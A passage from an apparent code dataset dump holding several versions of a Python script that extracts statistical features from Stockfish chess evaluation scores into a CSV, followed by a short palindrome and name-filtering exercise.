black_q1_stdev,\n 'black_q2_stdev': black_q2_stdev, 'black_q3_stdev': black_q3_stdev,\n 'black_q4_stdev': black_q4_stdev, 'game_score10': game_score10,\n 'game_score20': game_score20, 'game_score30': game_score30,\n 'game_score40': game_score40, 'game_score50': game_score50,\n 'game_score60': game_score60, 'game_score70': game_score70,\n 'game_score80': game_score80, 'game_score90': game_score90,\n 'game_score100': game_score100}\nchess_df = pd.DataFrame(chess_dict, index=[x for x in range(1, 50001)])\nchess_df.index.name = 'Event'\nchess_df.to_csv('score_features.csv')\n",
"step-4": "import numpy as np\nimport pandas as pd\nraw_scores = [line.strip().split(',')[1].split() for line in open(\n 'stockfish.csv')][1:]\ngame_length = []\naverage_score = []\nscore_stdev = []\nlargest_gain = []\nlargest_drop = []\nmax_score = []\nmin_score = []\nending_score = []\nwhite_avg_improve = []\nblack_avg_improve = []\nwhite_median_improve = []\nblack_median_improve = []\nwhite_q1_improve = []\nwhite_q2_improve = []\nwhite_q3_improve = []\nwhite_q4_improve = []\nblack_q1_improve = []\nblack_q2_improve = []\nblack_q3_improve = []\nblack_q4_improve = []\ngame_score10 = []\ngame_score20 = []\ngame_score30 = []\ngame_score40 = []\ngame_score50 = []\ngame_score60 = []\ngame_score70 = []\ngame_score80 = []\ngame_score90 = []\ngame_score100 = []\nwhite_q1_max = []\nwhite_q2_max = []\nwhite_q3_max = []\nwhite_q4_max = []\nblack_q1_max = []\nblack_q2_max = []\nblack_q3_max = []\nblack_q4_max = []\nwhite_q1_min = []\nwhite_q2_min = []\nwhite_q3_min = []\nwhite_q4_min = []\nblack_q1_min = []\nblack_q2_min = []\nblack_q3_min = []\nblack_q4_min = []\nwhite_q1_stdev = []\nwhite_q2_stdev = []\nwhite_q3_stdev = []\nwhite_q4_stdev = []\nblack_q1_stdev = []\nblack_q2_stdev = []\nblack_q3_stdev = []\nblack_q4_stdev = []\nwhite_5_improve = []\nwhite_10_improve = []\nwhite_15_improve = []\nwhite_20_improve = []\nwhite_25_improve = []\nwhite_30_improve = []\nwhite_35_improve = []\nwhite_40_improve = []\nwhite_45_improve = []\nwhite_50_improve = []\nwhite_55_improve = []\nwhite_60_improve = []\nwhite_65_improve = []\nwhite_70_improve = []\nwhite_75_improve = []\nblack_5_improve = []\nblack_10_improve = []\nblack_15_improve = []\nblack_20_improve = []\nblack_25_improve = []\nblack_30_improve = []\nblack_35_improve = []\nblack_40_improve = []\nblack_45_improve = []\nblack_50_improve = []\nblack_55_improve = []\nblack_60_improve = []\nblack_65_improve = []\nblack_70_improve = []\nblack_75_improve = []\nfor game in raw_scores:\n game_len = len(game) + 1\n total = 0\n prev = None\n player = 1\n max_so_far = -100\n min_so_far = 100\n max_drop = 0\n max_gain = 0\n white_improve = [0]\n black_improve = [0]\n game_nums = [0]\n for score in game:\n if score != 'NA':\n score = int(score)\n game_nums.append(score)\n total += score\n if prev != None:\n change = score - prev\n if change < max_drop:\n max_drop = change\n if change > max_gain:\n max_gain = change\n if player == 1:\n black_improve.append(change)\n else:\n white_improve.append(change)\n player = abs(player - 1)\n prev = score\n if score > max_so_far:\n max_so_far = score\n if score < min_so_far:\n min_so_far = score\n white_avg = sum(white_improve) / (game_len / 2)\n black_avg = sum(black_improve) / (game_len / 2)\n game_length.append(game_len)\n average_score.append(total / game_len)\n score_stdev.append(np.std(np.array(game_nums)))\n largest_gain.append(max_gain)\n largest_drop.append(max_drop)\n max_score.append(max_so_far)\n min_score.append(min_so_far)\n white_avg_improve.append(white_avg)\n black_avg_improve.append(black_avg)\n white_median_improve.append(sorted(white_improve)[len(white_improve) // 2])\n black_median_improve.append(sorted(black_improve)[len(black_improve) // 2])\n white_q1_improve.append(sum(white_improve[0:len(white_improve) // 4]) /\n len(white_improve) // 4)\n white_q2_improve.append(sum(white_improve[len(white_improve) // 4:len(\n white_improve) // 4 * 2]) / len(white_improve) // 4)\n white_q3_improve.append(sum(white_improve[len(white_improve) // 4 * 2:\n len(white_improve) // 4 * 3]) / len(white_improve) // 4)\n white_q4_improve.append(sum(white_improve[len(white_improve) // 4 * 3:]\n ) / len(white_improve) // 4)\n black_q1_improve.append(sum(black_improve[0:len(black_improve) // 4]) /\n len(black_improve) // 4)\n black_q2_improve.append(sum(black_improve[len(black_improve) // 4:len(\n black_improve) // 4 * 2]) / len(black_improve) // 4)\n black_q3_improve.append(sum(black_improve[len(black_improve) // 4 * 2:\n len(black_improve) // 4 * 3]) / len(black_improve) // 4)\n black_q4_improve.append(sum(black_improve[len(black_improve) // 4 * 3:]\n ) / len(black_improve) // 4)\n white_q1_max.append(max(white_improve[0:1 + len(white_improve) // 4]))\n white_q2_max.append(max(white_improve[len(white_improve) // 4:1 + len(\n white_improve) // 4 * 2]))\n white_q3_max.append(max(white_improve[len(white_improve) // 4 * 2:1 + \n len(white_improve) // 4 * 3]))\n white_q4_max.append(max(white_improve[len(white_improve) // 4 * 3:]))\n black_q1_max.append(max(black_improve[0:1 + len(black_improve) // 4]))\n black_q2_max.append(max(black_improve[len(black_improve) // 4:1 + len(\n black_improve) // 4 * 2]))\n black_q3_max.append(max(black_improve[len(black_improve) // 4 * 2:1 + \n len(black_improve) // 4 * 3]))\n black_q4_max.append(max(black_improve[len(black_improve) // 4 * 3:]))\n white_q1_min.append(min(white_improve[0:1 + len(white_improve) // 4]))\n white_q2_min.append(min(white_improve[len(white_improve) // 4:1 + len(\n white_improve) // 4 * 2]))\n white_q3_min.append(min(white_improve[len(white_improve) // 4 * 2:1 + \n len(white_improve) // 4 * 3]))\n white_q4_min.append(min(white_improve[len(white_improve) // 4 * 3:]))\n black_q1_min.append(min(black_improve[0:1 + len(black_improve) // 4]))\n black_q2_min.append(min(black_improve[len(black_improve) // 4:1 + len(\n black_improve) // 4 * 2]))\n black_q3_min.append(min(black_improve[len(black_improve) // 4 * 2:1 + \n len(black_improve) // 4 * 3]))\n black_q4_min.append(min(black_improve[len(black_improve) // 4 * 3:]))\n white_q1_stdev.append(np.std(np.array(white_improve[0:len(white_improve\n ) // 4])))\n white_q2_stdev.append(np.std(np.array(white_improve[len(white_improve) //\n 4:len(white_improve) // 4 * 2])))\n white_q3_stdev.append(np.std(np.array(white_improve[len(white_improve) //\n 4 * 2:len(white_improve) // 4 * 3])))\n white_q4_stdev.append(np.std(np.array(white_improve[len(white_improve) //\n 4 * 3:])))\n black_q1_stdev.append(np.std(np.array(black_improve[0:len(black_improve\n ) // 4])))\n black_q2_stdev.append(np.std(np.array(black_improve[len(black_improve) //\n 4:len(black_improve) // 4 * 2])))\n black_q3_stdev.append(np.std(np.array(black_improve[len(black_improve) //\n 4 * 2:len(black_improve) // 4 * 3])))\n black_q4_stdev.append(np.std(np.array(black_improve[len(black_improve) //\n 4 * 3:])))\n if len(white_improve) >= 5:\n white_5_improve.append(sum(white_improve[0:5]) / 5)\n else:\n white_5_improve.append(white_avg)\n if len(white_improve) >= 10:\n white_10_improve.append(sum(white_improve[5:10]) / 5)\n else:\n white_10_improve.append(white_avg)\n if len(white_improve) >= 15:\n white_15_improve.append(sum(white_improve[10:15]) / 5)\n else:\n white_15_improve.append(white_avg)\n if len(white_improve) >= 20:\n white_20_improve.append(sum(white_improve[15:20]) / 5)\n else:\n white_20_improve.append(white_avg)\n if len(white_improve) >= 25:\n white_25_improve.append(sum(white_improve[20:25]) / 5)\n else:\n white_25_improve.append(white_avg)\n if len(white_improve) >= 30:\n white_30_improve.append(sum(white_improve[25:30]) / 5)\n else:\n white_30_improve.append(white_avg)\n if len(white_improve) >= 35:\n white_35_improve.append(sum(white_improve[30:35]) / 5)\n else:\n white_35_improve.append(white_avg)\n if len(white_improve) >= 40:\n white_40_improve.append(sum(white_improve[35:40]) / 5)\n else:\n white_40_improve.append(white_avg)\n if len(white_improve) >= 45:\n white_45_improve.append(sum(white_improve[40:45]) / 5)\n else:\n white_45_improve.append(white_avg)\n if len(white_improve) >= 50:\n white_50_improve.append(sum(white_improve[45:50]) / 5)\n else:\n white_50_improve.append(white_avg)\n if len(white_improve) >= 55:\n white_55_improve.append(sum(white_improve[50:55]) / 5)\n else:\n white_55_improve.append(white_avg)\n if len(white_improve) >= 60:\n white_60_improve.append(sum(white_improve[55:60]) / 5)\n else:\n white_60_improve.append(white_avg)\n if len(white_improve) >= 65:\n white_65_improve.append(sum(white_improve[60:65]) / 5)\n else:\n white_65_improve.append(white_avg)\n if len(white_improve) >= 70:\n white_70_improve.append(sum(white_improve[65:70]) / 5)\n else:\n white_70_improve.append(white_avg)\n if len(white_improve) >= 75:\n white_75_improve.append(sum(white_improve[70:75]) / 5)\n else:\n white_75_improve.append(white_avg)\n if len(black_improve) >= 5:\n black_5_improve.append(sum(black_improve[0:5]) / 5)\n else:\n black_5_improve.append(black_avg)\n if len(black_improve) >= 10:\n black_10_improve.append(sum(black_improve[5:10]) / 5)\n else:\n black_10_improve.append(black_avg)\n if len(black_improve) >= 15:\n black_15_improve.append(sum(black_improve[10:15]) / 5)\n else:\n black_15_improve.append(black_avg)\n if len(black_improve) >= 20:\n black_20_improve.append(sum(black_improve[15:20]) / 5)\n else:\n black_20_improve.append(black_avg)\n if len(black_improve) >= 25:\n black_25_improve.append(sum(black_improve[20:25]) / 5)\n else:\n black_25_improve.append(black_avg)\n if len(black_improve) >= 30:\n black_30_improve.append(sum(black_improve[25:30]) / 5)\n else:\n black_30_improve.append(black_avg)\n if len(black_improve) >= 35:\n black_35_improve.append(sum(black_improve[30:35]) / 5)\n else:\n black_35_improve.append(black_avg)\n if len(black_improve) >= 40:\n black_40_improve.append(sum(black_improve[35:40]) / 5)\n else:\n black_40_improve.append(black_avg)\n if len(black_improve) >= 45:\n black_45_improve.append(sum(black_improve[40:45]) / 5)\n else:\n black_45_improve.append(black_avg)\n if len(black_improve) >= 50:\n black_50_improve.append(sum(black_improve[45:50]) / 5)\n else:\n black_50_improve.append(black_avg)\n if len(black_improve) >= 55:\n black_55_improve.append(sum(black_improve[50:55]) / 5)\n else:\n black_55_improve.append(black_avg)\n if len(black_improve) >= 60:\n black_60_improve.append(sum(black_improve[55:60]) / 5)\n else:\n black_60_improve.append(black_avg)\n if len(black_improve) >= 65:\n black_65_improve.append(sum(black_improve[60:65]) / 5)\n else:\n black_65_improve.append(black_avg)\n if len(black_improve) >= 70:\n black_70_improve.append(sum(black_improve[65:70]) / 5)\n else:\n black_70_improve.append(black_avg)\n if len(black_improve) >= 75:\n black_75_improve.append(sum(black_improve[70:75]) / 5)\n else:\n black_75_improve.append(black_avg)\n if len(game_nums) > 10:\n game_score10.append(game_nums[10])\n else:\n game_score10.append(0)\n if len(game_nums) > 20:\n game_score20.append(game_nums[20])\n else:\n game_score20.append(0)\n if len(game_nums) > 30:\n game_score30.append(game_nums[30])\n else:\n game_score30.append(0)\n if len(game_nums) > 40:\n game_score40.append(game_nums[40])\n else:\n game_score40.append(0)\n if len(game_nums) > 50:\n game_score50.append(game_nums[50])\n else:\n game_score50.append(0)\n if len(game_nums) > 60:\n game_score60.append(game_nums[60])\n else:\n game_score60.append(0)\n if len(game_nums) > 70:\n game_score70.append(game_nums[70])\n else:\n game_score70.append(0)\n if len(game_nums) > 80:\n game_score80.append(game_nums[80])\n else:\n game_score80.append(0)\n if len(game_nums) > 90:\n game_score90.append(game_nums[90])\n else:\n game_score90.append(0)\n if len(game_nums) > 100:\n game_score100.append(game_nums[100])\n else:\n game_score100.append(0)\n if prev:\n ending_score.append(prev)\n else:\n ending_score.append(0)\nchess_dict = {'game_length': game_length, 'average_score': average_score,\n 'score_stdev': score_stdev, 'largest_gain': largest_gain,\n 'largest_drop': largest_drop, 'max_score': max_score, 'min_score':\n min_score, 'ending_score': ending_score, 'white_avg_improve':\n white_avg_improve, 'black_avg_improve': black_avg_improve,\n 'white_median_improve': white_median_improve, 'black_median_improve':\n black_median_improve, 'white_q1_improve': white_q1_improve,\n 'white_q2_improve': white_q2_improve, 'white_q3_improve':\n white_q3_improve, 'white_q4_improve': white_q4_improve,\n 'black_q1_improve': black_q1_improve, 'black_q2_improve':\n black_q2_improve, 'black_q3_improve': black_q3_improve,\n 'black_q4_improve': black_q4_improve, 'white_5_improve':\n white_5_improve, 'white_10_improve': white_10_improve,\n 'white_15_improve': white_15_improve, 'white_20_improve':\n white_20_improve, 'white_25_improve': white_25_improve,\n 'white_30_improve': white_30_improve, 'white_35_improve':\n white_35_improve, 'white_40_improve': white_40_improve,\n 'white_45_improve': white_45_improve, 'white_50_improve':\n white_50_improve, 'white_55_improve': white_55_improve,\n 'white_60_improve': white_60_improve, 'white_65_improve':\n white_65_improve, 'white_70_improve': white_70_improve,\n 'white_75_improve': white_75_improve, 'black_5_improve':\n black_5_improve, 'black_10_improve': black_10_improve,\n 'black_15_improve': black_15_improve, 'black_20_improve':\n black_20_improve, 'black_25_improve': black_25_improve,\n 'black_30_improve': black_30_improve, 'black_35_improve':\n black_35_improve, 'black_40_improve': black_40_improve,\n 'black_45_improve': black_45_improve, 'black_50_improve':\n black_50_improve, 'black_55_improve': black_55_improve,\n 'black_60_improve': black_60_improve, 'black_65_improve':\n black_65_improve, 'black_70_improve': black_70_improve,\n 'black_75_improve': black_75_improve, 'white_q1_max': white_q1_max,\n 'white_q2_max': white_q2_max, 'white_q3_max': white_q3_max,\n 'white_q4_max': white_q4_max, 'black_q1_max': black_q1_max,\n 'black_q2_max': black_q2_max, 'black_q3_max': black_q3_max,\n 'black_q4_max': black_q4_max, 'white_q1_min': white_q1_min,\n 'white_q2_min': white_q2_min, 'white_q3_min': white_q3_min,\n 'white_q4_min': white_q4_min, 'black_q1_min': black_q1_min,\n 'black_q2_min': black_q2_min, 'black_q3_min': black_q3_min,\n 'black_q4_min': black_q4_min, 'white_q1_stdev': white_q1_stdev,\n 'white_q2_stdev': white_q2_stdev, 'white_q3_stdev': white_q3_stdev,\n 'white_q4_stdev': white_q4_stdev, 'black_q1_stdev': black_q1_stdev,\n 'black_q2_stdev': black_q2_stdev, 'black_q3_stdev': black_q3_stdev,\n 'black_q4_stdev': black_q4_stdev, 'game_score10': game_score10,\n 'game_score20': game_score20, 'game_score30': game_score30,\n 'game_score40': game_score40, 'game_score50': game_score50,\n 'game_score60': game_score60, 'game_score70': game_score70,\n 'game_score80': game_score80, 'game_score90': game_score90,\n 'game_score100': game_score100}\nchess_df = pd.DataFrame(chess_dict, index=[x for x in range(1, 50001)])\nchess_df.index.name = 'Event'\nchess_df.to_csv('score_features.csv')\n",
"step-5": "#Script to extract features from chess score data file stockfish.csv\nimport numpy as np\nimport pandas as pd\n\n#Load in and format raw chess game scoring data\nraw_scores = [line.strip().split(\",\")[1].split() for line in open(\"stockfish.csv\")][1:]\n\n#Initialize containers for features to extract\ngame_length = []\naverage_score = []\nscore_stdev = []\nlargest_gain = []\nlargest_drop = []\nmax_score = []\nmin_score = []\nending_score = []\nwhite_avg_improve = []\nblack_avg_improve = []\nwhite_median_improve = []\nblack_median_improve = []\nwhite_q1_improve =[]\nwhite_q2_improve =[]\nwhite_q3_improve =[]\nwhite_q4_improve =[]\nblack_q1_improve =[]\nblack_q2_improve =[]\nblack_q3_improve =[]\nblack_q4_improve =[]\n\ngame_score10 = []\ngame_score20 = []\ngame_score30 = []\ngame_score40 = []\ngame_score50 = []\ngame_score60 = []\ngame_score70 = []\ngame_score80 = []\ngame_score90 = []\ngame_score100 = []\n\nwhite_q1_max =[]\nwhite_q2_max =[]\nwhite_q3_max =[]\nwhite_q4_max =[]\nblack_q1_max =[]\nblack_q2_max =[]\nblack_q3_max =[]\nblack_q4_max =[]\n\nwhite_q1_min =[]\nwhite_q2_min =[]\nwhite_q3_min =[]\nwhite_q4_min =[]\nblack_q1_min =[]\nblack_q2_min =[]\nblack_q3_min =[]\nblack_q4_min =[]\n\nwhite_q1_stdev =[]\nwhite_q2_stdev =[]\nwhite_q3_stdev =[]\nwhite_q4_stdev =[]\nblack_q1_stdev =[]\nblack_q2_stdev =[]\nblack_q3_stdev =[]\nblack_q4_stdev =[]\n\nwhite_5_improve = []\nwhite_10_improve = []\nwhite_15_improve = []\nwhite_20_improve = []\nwhite_25_improve = []\nwhite_30_improve = []\nwhite_35_improve = []\nwhite_40_improve = []\nwhite_45_improve = []\nwhite_50_improve = []\nwhite_55_improve = []\nwhite_60_improve = []\nwhite_65_improve = []\nwhite_70_improve = []\nwhite_75_improve = []\n\nblack_5_improve = []\nblack_10_improve = []\nblack_15_improve = []\nblack_20_improve = []\nblack_25_improve = []\nblack_30_improve = []\nblack_35_improve = []\nblack_40_improve = []\nblack_45_improve = []\nblack_50_improve = []\nblack_55_improve = []\nblack_60_improve = []\nblack_65_improve = []\nblack_70_improve = []\nblack_75_improve = []\n\n\n#Loop through game data, calculate and append new features to feature containers\nfor game in raw_scores:\n game_len = len(game)+1 # Add 1 to game length to avoid divide by zero errors caused by empty games\n total = 0\n prev = None\n player = 1\n max_so_far = -100\n min_so_far = 100\n max_drop = 0\n max_gain = 0\n white_improve = [0]\n black_improve = [0]\n game_nums = [0]\n for score in game:\n if score != \"NA\":\n score = int(score)\n game_nums.append(score)\n total+=score\n if prev != None:\n change = score - prev\n if change < max_drop:\n max_drop = change\n if change > max_gain:\n max_gain = change\n if player == 1:\n black_improve.append(change)\n else:\n white_improve.append(change)\n player = abs(player-1)\n prev = score\n if score > max_so_far:\n max_so_far = score\n if score < min_so_far:\n min_so_far = score\n\n #Add computed values to feature containers\n white_avg = sum(white_improve)/(game_len/2)\n black_avg = sum(black_improve)/(game_len/2)\n game_length.append(game_len)\n average_score.append(total/game_len)\n score_stdev.append(np.std(np.array(game_nums)))\n largest_gain.append(max_gain)\n largest_drop.append(max_drop)\n max_score.append(max_so_far)\n min_score.append(min_so_far)\n white_avg_improve.append(white_avg)\n black_avg_improve.append(black_avg)\n white_median_improve.append(sorted(white_improve)[len(white_improve)//2])\n black_median_improve.append(sorted(black_improve)[len(black_improve)//2])\n\n white_q1_improve.append( sum(white_improve[0:len(white_improve)//4])/len(white_improve)//4 )\n white_q2_improve.append( sum(white_improve[len(white_improve)//4 : (len(white_improve)//4)*2])/len(white_improve)//4 )\n white_q3_improve.append( sum(white_improve[(len(white_improve)//4)*2 : (len(white_improve)//4)*3])/len(white_improve)//4 )\n white_q4_improve.append( sum(white_improve[(len(white_improve)//4)*3 : ])/len(white_improve)//4 )\n black_q1_improve.append( sum(black_improve[0:len(black_improve)//4])/len(black_improve)//4 )\n black_q2_improve.append( sum(black_improve[len(black_improve)//4 : (len(black_improve)//4)*2])/len(black_improve)//4 )\n black_q3_improve.append( sum(black_improve[(len(black_improve)//4)*2 : (len(black_improve)//4)*3])/len(black_improve)//4 )\n black_q4_improve.append( sum(black_improve[(len(black_improve)//4)*3 : ])/len(black_improve)//4 )\n\n white_q1_max.append(max(white_improve[0:1+len(white_improve)//4]))\n white_q2_max.append(max(white_improve[len(white_improve)//4 : 1+(len(white_improve)//4)*2]))\n white_q3_max.append(max(white_improve[(len(white_improve)//4)*2 : 1+(len(white_improve)//4)*3]))\n white_q4_max.append(max(white_improve[(len(white_improve)//4)*3 : ]))\n black_q1_max.append(max(black_improve[0:1+len(black_improve)//4]))\n black_q2_max.append(max(black_improve[len(black_improve)//4 : 1+(len(black_improve)//4)*2]))\n black_q3_max.append(max(black_improve[(len(black_improve)//4)*2 : 1+(len(black_improve)//4)*3]))\n black_q4_max.append(max(black_improve[(len(black_improve)//4)*3 : ]))\n\n white_q1_min.append(min(white_improve[0:1+len(white_improve)//4]))\n white_q2_min.append(min(white_improve[len(white_improve)//4 : 1+(len(white_improve)//4)*2]))\n white_q3_min.append(min(white_improve[(len(white_improve)//4)*2 : 1+(len(white_improve)//4)*3]))\n white_q4_min.append(min(white_improve[(len(white_improve)//4)*3 : ]))\n black_q1_min.append(min(black_improve[0:1+len(black_improve)//4]))\n black_q2_min.append(min(black_improve[len(black_improve)//4 : 1+(len(black_improve)//4)*2]))\n black_q3_min.append(min(black_improve[(len(black_improve)//4)*2 : 1+(len(black_improve)//4)*3]))\n black_q4_min.append(min(black_improve[(len(black_improve)//4)*3 : ]))\n\n white_q1_stdev.append(np.std(np.array((white_improve[0:len(white_improve)//4]))))\n white_q2_stdev.append(np.std(np.array((white_improve[len(white_improve)//4 : (len(white_improve)//4)*2]))))\n white_q3_stdev.append(np.std(np.array((white_improve[(len(white_improve)//4)*2 : (len(white_improve)//4)*3]))))\n white_q4_stdev.append(np.std(np.array((white_improve[(len(white_improve)//4)*3 : ]))))\n black_q1_stdev.append(np.std(np.array((black_improve[0:len(black_improve)//4]))))\n black_q2_stdev.append(np.std(np.array((black_improve[len(black_improve)//4 : (len(black_improve)//4)*2]))))\n black_q3_stdev.append(np.std(np.array((black_improve[(len(black_improve)//4)*2 : (len(black_improve)//4)*3]))))\n black_q4_stdev.append(np.std(np.array((black_improve[(len(black_improve)//4)*3 : ]))))\n\n if len(white_improve) >=5:\n white_5_improve.append( sum(white_improve[0:5])/5 )\n else:\n white_5_improve.append(white_avg)\n if len(white_improve) >=10:\n white_10_improve.append( sum(white_improve[5:10])/5 )\n else:\n white_10_improve.append(white_avg)\n if len(white_improve) >=15:\n white_15_improve.append( sum(white_improve[10:15])/5 )\n else:\n white_15_improve.append(white_avg)\n if len(white_improve) >=20:\n white_20_improve.append( sum(white_improve[15:20])/5 )\n else:\n white_20_improve.append(white_avg)\n if len(white_improve) >=25:\n white_25_improve.append( sum(white_improve[20:25])/5 )\n else:\n white_25_improve.append(white_avg)\n if len(white_improve) >=30:\n white_30_improve.append( sum(white_improve[25:30])/5 )\n else:\n white_30_improve.append(white_avg)\n if len(white_improve) >=35:\n white_35_improve.append( sum(white_improve[30:35])/5 )\n else:\n white_35_improve.append(white_avg)\n if len(white_improve) >=40:\n white_40_improve.append( sum(white_improve[35:40])/5 )\n else:\n white_40_improve.append(white_avg)\n if len(white_improve) >=45:\n white_45_improve.append( sum(white_improve[40:45])/5 )\n else:\n white_45_improve.append(white_avg)\n if len(white_improve) >=50:\n white_50_improve.append( sum(white_improve[45:50])/5 )\n else:\n white_50_improve.append(white_avg)\n if len(white_improve) >=55:\n white_55_improve.append( sum(white_improve[50:55])/5 )\n else:\n white_55_improve.append(white_avg)\n if len(white_improve) >=60:\n white_60_improve.append( sum(white_improve[55:60])/5 )\n else:\n white_60_improve.append(white_avg)\n if len(white_improve) >=65:\n white_65_improve.append( sum(white_improve[60:65])/5 )\n else:\n white_65_improve.append(white_avg)\n if len(white_improve) >=70:\n white_70_improve.append( sum(white_improve[65:70])/5 )\n else:\n white_70_improve.append(white_avg)\n if len(white_improve) >=75:\n white_75_improve.append( sum(white_improve[70:75])/5 )\n else:\n white_75_improve.append(white_avg)\n\n if len(black_improve) >=5:\n black_5_improve.append( sum(black_improve[0:5])/5 )\n else:\n black_5_improve.append(black_avg)\n if len(black_improve) >=10:\n black_10_improve.append( sum(black_improve[5:10])/5 )\n else:\n black_10_improve.append(black_avg)\n if len(black_improve) >=15:\n black_15_improve.append( sum(black_improve[10:15])/5 )\n else:\n black_15_improve.append(black_avg)\n if len(black_improve) >=20:\n black_20_improve.append( sum(black_improve[15:20])/5 )\n else:\n black_20_improve.append(black_avg)\n if len(black_improve) >=25:\n black_25_improve.append( sum(black_improve[20:25])/5 )\n else:\n black_25_improve.append(black_avg)\n if len(black_improve) >=30:\n black_30_improve.append( sum(black_improve[25:30])/5 )\n else:\n black_30_improve.append(black_avg)\n if len(black_improve) >=35:\n black_35_improve.append( sum(black_improve[30:35])/5 )\n else:\n black_35_improve.append(black_avg)\n if len(black_improve) >=40:\n black_40_improve.append( sum(black_improve[35:40])/5 )\n else:\n black_40_improve.append(black_avg)\n if len(black_improve) >=45:\n black_45_improve.append( sum(black_improve[40:45])/5 )\n else:\n black_45_improve.append(black_avg)\n if len(black_improve) >=50:\n black_50_improve.append( sum(black_improve[45:50])/5 )\n else:\n black_50_improve.append(black_avg)\n if len(black_improve) >=55:\n black_55_improve.append( sum(black_improve[50:55])/5 )\n else:\n black_55_improve.append(black_avg)\n if len(black_improve) >=60:\n black_60_improve.append( sum(black_improve[55:60])/5 )\n else:\n black_60_improve.append(black_avg)\n if len(black_improve) >=65:\n black_65_improve.append( sum(black_improve[60:65])/5 )\n else:\n black_65_improve.append(black_avg)\n if len(black_improve) >=70:\n black_70_improve.append( sum(black_improve[65:70])/5 )\n else:\n black_70_improve.append(black_avg)\n if len(black_improve) >=75:\n black_75_improve.append( sum(black_improve[70:75])/5 )\n else:\n black_75_improve.append(black_avg)\n\n if len(game_nums)>10:\n game_score10.append(game_nums[10])\n else:\n game_score10.append(0)\n if len(game_nums)>20:\n game_score20.append(game_nums[20])\n else:\n game_score20.append(0)\n if len(game_nums)>30:\n game_score30.append(game_nums[30])\n else:\n game_score30.append(0)\n if len(game_nums)>40:\n game_score40.append(game_nums[40])\n else:\n game_score40.append(0)\n if len(game_nums)>50:\n game_score50.append(game_nums[50])\n else:\n game_score50.append(0)\n if len(game_nums)>60:\n game_score60.append(game_nums[60])\n else:\n game_score60.append(0)\n if len(game_nums)>70:\n game_score70.append(game_nums[70])\n else:\n game_score70.append(0)\n if len(game_nums)>80:\n game_score80.append(game_nums[80])\n else:\n game_score80.append(0)\n if len(game_nums)>90:\n game_score90.append(game_nums[90])\n else:\n game_score90.append(0)\n if len(game_nums)>100:\n game_score100.append(game_nums[100])\n else:\n game_score100.append(0)\n\n if prev:\n ending_score.append(prev)\n else:\n ending_score.append(0)\n\nchess_dict = {\"game_length\":game_length,\"average_score\":average_score,\"score_stdev\":score_stdev,\"largest_gain\":largest_gain,\n \"largest_drop\":largest_drop,\"max_score\":max_score,\"min_score\":min_score,\n \"ending_score\":ending_score, \"white_avg_improve\":white_avg_improve,\n \"black_avg_improve\":black_avg_improve,\"white_median_improve\":white_median_improve,\n \"black_median_improve\":black_median_improve,\"white_q1_improve\":white_q1_improve,\n \"white_q2_improve\":white_q2_improve,\n \"white_q3_improve\":white_q3_improve,\n \"white_q4_improve\":white_q4_improve,\"black_q1_improve\":black_q1_improve,\n \"black_q2_improve\":black_q2_improve,\n \"black_q3_improve\":black_q3_improve,\n \"black_q4_improve\":black_q4_improve,\n 'white_5_improve': white_5_improve,\n 'white_10_improve': white_10_improve,\n 'white_15_improve': white_15_improve,\n 'white_20_improve': white_20_improve,\n 'white_25_improve': white_25_improve,\n 'white_30_improve': white_30_improve,\n 'white_35_improve': white_35_improve,\n 'white_40_improve': white_40_improve,\n 'white_45_improve': white_45_improve,\n 'white_50_improve': white_50_improve,\n 'white_55_improve': white_55_improve,\n 'white_60_improve': white_60_improve,\n 'white_65_improve': white_65_improve,\n 'white_70_improve': white_70_improve,\n 'white_75_improve': white_75_improve,\n 'black_5_improve': black_5_improve,\n 'black_10_improve': black_10_improve,\n 'black_15_improve': black_15_improve,\n 'black_20_improve': black_20_improve,\n 'black_25_improve': black_25_improve,\n 'black_30_improve': black_30_improve,\n 'black_35_improve': black_35_improve,\n 'black_40_improve': black_40_improve,\n 'black_45_improve': black_45_improve,\n 'black_50_improve': black_50_improve,\n 'black_55_improve': black_55_improve,\n 'black_60_improve': black_60_improve,\n 'black_65_improve': black_65_improve,\n 'black_70_improve': black_70_improve,\n 'black_75_improve': black_75_improve,\n\n 'white_q1_max': white_q1_max,\n 'white_q2_max': white_q2_max,\n 'white_q3_max': white_q3_max,\n 'white_q4_max': white_q4_max,\n 'black_q1_max': black_q1_max,\n 'black_q2_max': black_q2_max,\n 'black_q3_max': black_q3_max,\n 'black_q4_max': black_q4_max,\n\n 'white_q1_min': white_q1_min,\n 'white_q2_min': white_q2_min,\n 'white_q3_min': white_q3_min,\n 'white_q4_min': white_q4_min,\n 'black_q1_min': black_q1_min,\n 'black_q2_min': black_q2_min,\n 'black_q3_min': black_q3_min,\n 'black_q4_min': black_q4_min,\n\n 'white_q1_stdev': white_q1_stdev,\n 'white_q2_stdev': white_q2_stdev,\n 'white_q3_stdev': white_q3_stdev,\n 'white_q4_stdev': white_q4_stdev,\n 'black_q1_stdev': black_q1_stdev,\n 'black_q2_stdev': black_q2_stdev,\n 'black_q3_stdev': black_q3_stdev,\n 'black_q4_stdev': black_q4_stdev,\n\n 'game_score10':game_score10,\n 'game_score20':game_score20,\n 'game_score30':game_score30,\n 'game_score40':game_score40,\n 'game_score50':game_score50,\n 'game_score60':game_score60,\n 'game_score70':game_score70,\n 'game_score80':game_score80,\n 'game_score90':game_score90,\n 'game_score100':game_score100\n}\n\n#Create feature data frame\nchess_df = pd.DataFrame(chess_dict, index=[x for x in range(1,50001)])\nchess_df.index.name = \"Event\"\n\n#Write the new feature data frame to CSV\nchess_df.to_csv(\"score_features.csv\")\n\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
data = " Ramya , Deepa,LIRIL ,amma, dad, Kiran, 12321 , Suresh, Jayesh, Ramesh,Balu"
lst = data.split(",")
for name in lst:
name = name.strip().upper()
rname = name[::-1]
if name == rname:
print(name)
girlsdata = "Tanvi,Dhatri,Haadya,Deepthi,Deepa,Ramya"
# Name which start with DEE get those name
print("-"*20)
names = girlsdata.split(",")
for name in names:
name = name.upper()
if "D" in name:
print(name)
|
normal
|
{
"blob_id": "622b388beb56eba85bbb08510c2bcea55f23da9a",
"index": 721,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nfor name in lst:\n name = name.strip().upper()\n rname = name[::-1]\n if name == rname:\n print(name)\n<mask token>\nprint('-' * 20)\n<mask token>\nfor name in names:\n name = name.upper()\n if 'D' in name:\n print(name)\n",
